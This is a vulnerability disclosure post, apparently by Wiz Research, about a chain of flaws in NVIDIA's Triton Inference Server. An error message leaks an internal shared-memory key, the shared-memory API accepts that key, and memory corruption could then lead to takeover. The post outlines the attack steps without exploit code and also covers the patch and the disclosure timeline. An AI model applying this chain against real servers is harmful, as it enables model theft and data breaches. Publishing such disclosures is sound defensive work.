Breaking NVIDIA Triton: CVE-2025-23319 - A Vulnerability Chain Leading to AI Server Takeover

Wiz Research discovers a critical vulnerability chain allowing unauthenticated attackers to take over NVIDIA's Triton Inference Server.

The Wiz Research team has discovered a chain of critical vulnerabilities in NVIDIA's Triton Inference Server, a popular open-source platform for running AI models at scale. When chained together, these flaws can potentially allow a remote, unauthenticated attacker to gain complete control of the server, achieving remote code execution (RCE).

This attack path originates in the server's Python backend and starts with a minor information leak that cleverly escalates into a full system compromise. This poses a critical risk to organizations using Triton for AI/ML, as a successful attack could lead to the theft of valuable AI models, exposure of sensitive data, manipulating the AI model's responses and a foothold for attackers to move deeper into a network.

Wiz Research responsibly disclosed these findings to NVIDIA, and a patch has been released. We would like to thank the NVIDIA security team for their excellent collaboration and swift response. NVIDIA has assigned the following identifiers to this vulnerability chain: CVE-2025-23319, CVE-2025-23320, and CVE-2025-23334. We strongly recommend all Triton Inference Server users update to the latest version. This post provides a high-level overview of these new vulnerabilities and their potential impact. 

The enclosed work is the latest in a series of NVIDIA vulnerabilities we’ve disclosed, including two container escapes: CVE-2025-23266 and CVE 2024-0132.

Mitigations

  1. Update Immediately: The primary mitigation is to upgrade both the NVIDIA Triton Inference Server and the Python backend to version 25.07 as advised in the NVIDIA security bulletin

Wiz customers can use the following to detect vulnerable instances in their cloud environment:

The Inner Workings of Triton

To understand the vulnerability, it helps to know a little about Triton's architecture. Triton is designed to be a universal inference server, capable of deploying models from any major AI framework (PyTorch, TensorFlow, etc.). It achieves this flexibility through a modular system of backends, where each backend is responsible for executing models from a specific framework. When an inference request for a specific model arrives, Triton automatically routes the request to the necessary backend for execution.

Our research focused on the Python backend, as it is one of the most popular and versatile backends in the Triton ecosystem. It not only serves models written directly in Python but also acts as a dependency for several other backends. This means that even models configured to run under a different backend might still internally use the Python backend for other phases of the inference process. Given its widespread usage, we decided to focus our security research on this component.



Python backend internals

The Triton Python backend's core logic is implemented in C++ and is designed to handle inference requests for Python models. When a request arrives, this C++ component communicates with a separate "stub" process, which is responsible for loading and executing the model code. To facilitate communication between its own C++ logic and this stub process, the backend relies on a sophisticated Inter-Process Communication (IPC) mechanism for both inference and internal operations. This IPC is built on named shared memory (/dev/shm), creating a memory region accessible via a unique system path. This design allows for high-speed data exchange, but it also introduces a critical dependency: the security and privacy of the shared memory names.

Vulnerabilities Overview

Step 1: Information Disclosure of the Backend's Shared Memory Name

During our audit of the Python backend, we discovered a flaw in its error handling mechanism. By sending a crafted, large remote request, an attacker can trigger an exception that results in a crucial information disclosure. The resulting error message, returned to the user, improperly includes the full, unique name of the backend's internal IPC shared memory region.

The returned error message appears as follows: {"error":"Failed to increase the shared memory pool size for key 'triton_python_backend_shm_region_4f50c226-b3d0-46e8-ac59-d4690b28b859'..."}

The disclosure of this name is the first critical step in the exploit chain, as it exposes an internal component that should remain private.

Step 2: Abusing the Shared Memory API for Arbitrary Read/Write

Triton offers a user-facing shared memory feature for performance. A client can use this feature to have Triton read input tensors from, and write output tensors to, a pre-existing shared memory region. This process avoids the costly transfer of large amounts of data over the network and is a documented, powerful tool for optimizing inference workloads.

/dev/shm/wiz-legit-shared-memory

Example of a user-created shared memory region's location

With the leaked name of the Python backend's internal IPC shared memory, an attacker can turn this public-facing API against itself. The vulnerability lies in the API's lack of validation; it does not check whether a provided shared memory key corresponds to a legitimate user-owned region or a private, internal one.

/dev/shm/triton_python_backend_shm_region_4f50c226-b3d0-46e8-ac59-d4690b28b859

Forcing Triton to use the Python backend's internal shared memory by providing it with the key triton_python_backend_shm_region_4f50c226-b3d0-46e8-ac59-d4690b28b859

An attacker can therefore call the registration endpoint with the leaked internal key. Once the server accepts it, they can craft subsequent inference requests that use this region for input or output. This provides the attacker with powerful read and write primitives into the Python backend's private memory, which also contains internal data and control structures related to its IPC mechanism, all performed through standard, legitimate API calls.

Step 3: Ways towards a Remote Code Execution

Since an attacker can now alter the Python backend's shared memory, they can cause unexpected behavior in the server. This capability can be leveraged to gain full control of the server. There are multiple exploitation avenues an attacker might use to achieve this:

  • One method involves corrupting existing data structures within the backend's shared memory region. Furthermore, an attacker can target specific structures that contain pointers (e.g., MemoryShm, SendMessageBase), which allows out-of-bounds memory access beyond the backend's shared memory.

  • Crafting malicious IPC messages and manipulating the IPC message queue to process them opens a new attack surface for exploitation, ranging from native memory corruption to logical exploits.

For now, we will not be publishing further technical details regarding the exploitation of this vulnerability.

Impact

The chain could allow a remote, unauthenticated attacker to take over an NVIDIA Triton Inference Server. This can lead to several critical outcomes, including:

  • Model Theft: Stealing proprietary and expensive AI models.

  • Data Breach: Intercepting sensitive data being processed by the models, such as user information or financial data.

  • Response Manipulation: Manipulating the AI model's output to produce incorrect, biased, or malicious responses.

  • Pivoting: Using the compromised server as a beachhead to attack other systems within the organization's network.

Conclusion

This research demonstrates how a series of seemingly minor flaws can be chained together to create a significant exploit. A verbose error message in a single component, a feature that can be misused in the main server were all it took to create a path to potential system compromise. As companies deploy AI and ML more widely, securing the underlying infrastructure is paramount. This discovery highlights the importance of defense-in-depth, where security is considered at every layer of an application.

Responsible Disclosure Timeline

  • May 15, 2025: Wiz Research reported the vulnerability chain to NVIDIA.

  • May 16, 2025: NVIDIA acknowledged the report.

  • August 4, 2025: NVIDIA published the security bulletin, patches, and assigned CVEs: CVE-2025-23319, CVE-2025-23320, and CVE-2025-23334.

  • August 4, 2025: Wiz Research publishes this blog post.

Stay in touch!

Hi there! We are Ronen Shustin (@ronenshh), Nir Ohfeld (@nirohfeld), Sagi Tzadik (@sagitz_), Hillai Ben-Sasson (@hillai), Andres Riancho (@andresriancho) and Yuval Avrahami (@yuvalavra) from the Wiz Research Team (@wiz_io). We are a group of veteran white-hat hackers with a single goal: to make the cloud a safer place for everyone. We primarily focus on finding new attack vectors in the cloud and uncovering isolation issues in cloud vendors and service providers. We would love to hear from you! Feel free to contact us on X (Twitter) or via email: research@wiz.io. 

See more from Wiz Research

Continue reading

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management